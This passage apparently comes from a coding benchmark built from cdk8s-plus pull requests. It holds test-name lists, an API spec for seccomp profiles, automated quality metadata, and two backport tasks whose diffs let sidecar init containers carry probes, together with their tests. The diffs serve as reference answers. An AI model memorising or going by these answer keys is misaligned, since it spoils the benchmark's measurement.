add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress 
to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when 
provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "default security context", "custom security context", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with 
different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with 
namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a 
ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it" ]
Enum: SeccompProfileType Location: src/container.ts Inputs: None (enumeration values) Outputs: Enum members: LOCALHOST = 'Localhost', RUNTIME_DEFAULT = 'RuntimeDefault', UNCONFINED = 'Unconfined' Description: Enumerates the supported seccomp profile types for a container's security context. Used to specify whether a profile is a localhost file, the runtime default, or no profile. Interface: SeccompProfile Location: src/container.ts Inputs: - type: SeccompProfileType (required) – indicates which kind of seccomp profile will be applied. - localhostProfile?: string (optional) – path to a localhost seccomp profile; must only be set when `type` is `SeccompProfileType.LOCALHOST`. Outputs: Object conforming to the interface; runtime validation throws an Error if `localhostProfile` is provided while `type` is not `LOCALHOST`. Description: Defines the shape of the seccomp profile configuration that can be attached to a container's security context. The test suite validates correct construction and error handling for improper combinations. Method: ContainerSecurityContext.constructor(props?: ContainerSecurityContextProps) Location: src/container.ts Inputs: - props: ContainerSecurityContextProps – optional configuration object. Added field `seccompProfile?: SeccompProfile` to the existing properties. Outputs: Instance of `ContainerSecurityContext` with a `seccompProfile` property reflecting the supplied configuration. Throws an Error with message `localhostProfile must only be set if type is "Localhost"` if validation fails. Description: Constructs a container security context, now supporting an optional `seccompProfile`. The test suite directly checks that the property is stored correctly and that invalid configurations raise the expected error.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/4499", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding seccompProfile support to Container security context but provides no details on the API shape or validation rules, making the specification ambiguous (B4). The tests also expect a specific enum name SeccompProfileType and its values, which were not mentioned in the issue, indicating implicit naming requirements (B2). No other coupling or external dependencies are evident, and the tests align with the intended implementation.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": 
null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
189074087c2bd858d77316ece86d98c4ab47a3c8
2024-08-27 10:52:19
cdk8s-team__cdk8s-plus-4574
diff --git a/src/pod.ts b/src/pod.ts index c7f4ea6b..3ac602bc 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -122,15 +122,15 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public addInitContainer(cont: container.ContainerProps): container.Container { // https://kubernetes.io/docs/concepts/workloads/pods/init-containers/#differences-from-regular-containers - if (cont.readiness) { + if (!this.isSidecarContainer(cont) && cont.readiness) { throw new Error('Init containers must not have a readiness probe'); } - if (cont.liveness) { + if (!this.isSidecarContainer(cont) && cont.liveness) { throw new Error('Init containers must not have a liveness probe'); } - if (cont.startup) { + if (!this.isSidecarContainer(cont) && cont.startup) { throw new Error('Init containers must not have a startup probe'); } @@ -143,6 +143,13 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, return impl; } + // Any initContainer that has `restartPolicy=Always` is a sidecar container. Please refer to + // documentation for more details: + // https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers + private isSidecarContainer(cont: container.ContainerProps) { + return cont.restartPolicy === container.ContainerRestartPolicy.ALWAYS; + } + public addHostAlias(hostAlias: HostAlias): void { this._hostAliases.push(hostAlias); }
fix(pod): allow sidecar containers to have probes (#4483) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [fix(pod): allow sidecar containers to have probes (#4483)](https://github.com/cdk8s-team/cdk8s-plus/pull/4483) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow sidecar init containers to define readiness, liveness and startup probes **Problem** Init containers are prohibited from having probes, but init containers that are actually sidecars (declared with a restart policy of Always) need to be able to use probes. The existing validation incorrectly rejects these sidecar containers. **Root Cause** The probe‑restriction logic treats every init container the same and does not distinguish sidecar containers. **Fix / Expected Behavior** - Detect when an init container is a sidecar based on its restart policy. - Skip the probe‑restriction checks for such sidecar init containers. - Preserve the prohibition of probes for regular init containers. - Keep existing init‑container handling unchanged apart from the sidecar exemption. **Risk & Validation** - Verify that regular init containers still throw errors when probes are provided. - Confirm that sidecar init containers can successfully set readiness, liveness, and startup probes. - Run the full test suite and add targeted tests for sidecar init‑container scenarios.
4,574
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 977e64da..17f44567 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -254,6 +254,45 @@ test('init containers cannot have startup probe', () => { }); +test('sidecar containers can have liveness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', liveness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].livenessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have readiness probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', readiness: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].readinessProbe).toBeTruthy(); + +}); + +test('sidecar containers can have startup probe', () => { + + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod', { containers: [{ image: 'image' }] }); + + pod.addInitContainer({ image: 'image', startup: Probe.fromTcpSocket(), restartPolicy: ContainerRestartPolicy.ALWAYS }); + + const spec = Testing.synth(chart)[0].spec; + + expect(spec.initContainers[0].startupProbe).toBeTruthy(); + +}); + test('can specify init containers at instantiation', () => { const chart = Testing.chart();
[ "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "default configuration", "custom configuration", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Can mutate metadata", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted 
by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 
29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", 
"addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container 
props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - 
default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress 
from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", 
"default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from 
managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom 
non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added" ]
Method: AbstractPod.addInitContainer(cont: container.ContainerProps) Location: src/pod.ts – class AbstractPod (extends base.Resource) Inputs: - **cont** – `container.ContainerProps` describing the init container. Important fields: • `image` (string, required) • `restartPolicy` (`container.ContainerRestartPolicy`) – when set to `ALWAYS` the container is treated as a side‑car. • Optional probe definitions `liveness`, `readiness`, `startup` of type `Probe`. • Probes are accepted **only** when `restartPolicy === ContainerRestartPolicy.ALWAYS`; otherwise they cause an error. Outputs: Returns the created `container.Container` object that is added to the pod’s `initContainers` array and will be rendered in the synthesized manifest (e.g., `spec.initContainers[0].livenessProbe` when a side‑car probe is supplied). Description: Adds an init container to a pod. The method now permits side‑car containers (identified by `restartPolicy: ALWAYS`) to include liveness, readiness, and startup probes, whereas regular init containers are still prohibited from having these probes.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sqren/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/4483" ], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue only states a backport of a fix without describing the expected behavior, while the tests assert that init containers with restartPolicy=Always (sidecars) may have liveness/readiness/startup probes. The tests therefore introduce requirements that are not present in the issue description, indicating an ambiguous specification. Since the test expectations are not derived from the issue text, the primary problem is a missing or incomplete specification.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests assert sidecar containers can have probes, which is not mentioned in the issue description" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, 
"test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
bcd98f94e402475318f7a340f752185daf9707b1
2024-08-27 10:52:22
cdk8s-team__cdk8s-plus-4575
diff --git a/src/pod.ts b/src/pod.ts index c7f4ea6b..3ac602bc 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -122,15 +122,15 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public addInitContainer(cont: container.ContainerProps): container.Container { // https://kubernetes.io/docs/concepts/workloads/pods/init-containers/#differences-from-regular-containers - if (cont.readiness) { + if (!this.isSidecarContainer(cont) && cont.readiness) { throw new Error('Init containers must not have a readiness probe'); } - if (cont.liveness) { + if (!this.isSidecarContainer(cont) && cont.liveness) { throw new Error('Init containers must not have a liveness probe'); } - if (cont.startup) { + if (!this.isSidecarContainer(cont) && cont.startup) { throw new Error('Init containers must not have a startup probe'); } @@ -143,6 +143,13 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, return impl; } + // Any initContainer that has `restartPolicy=Always` is a sidecar container. Please refer to + // documentation for more details: + // https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/#differences-from-init-containers + private isSidecarContainer(cont: container.ContainerProps) { + return cont.restartPolicy === container.ContainerRestartPolicy.ALWAYS; + } + public addHostAlias(hostAlias: HostAlias): void { this._hostAliases.push(hostAlias); }
fix(pod): allow sidecar containers to have probes (#4483) # Backport This will backport the following commits from `k8s-30/main` to `k8s-29/main`: - [fix(pod): allow sidecar containers to have probes (#4483)](https://github.com/cdk8s-team/cdk8s-plus/pull/4483) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow sidecar init containers to define readiness, liveness, and startup probes **Problem** Init containers are prohibited from having probes, but sidecar containers (a special type of init container with an always‑restart policy) need to be able to specify them. The existing validation prevented sidecars from adding probes, causing deployment failures for workloads that rely on sidecar health checks. **Root Cause** The probe‑restriction logic treated all init containers uniformly and did not distinguish sidecar containers based on their restart policy. **Fix / Expected Behavior** - Detect when an init container is a sidecar by checking its restart policy. - Exempt sidecar containers from the “no probes” validation. - Preserve the prohibition of probes for regular init containers. - Preserve existing behavior for other container types. **Risk & Validation** - Verify that regular init containers still reject probes. - Add tests confirming sidecar init containers can successfully define readiness, liveness, and startup probes. - Run the full test suite to ensure no regressions in pod handling logic.
4,575
cdk8s-team/cdk8s-plus
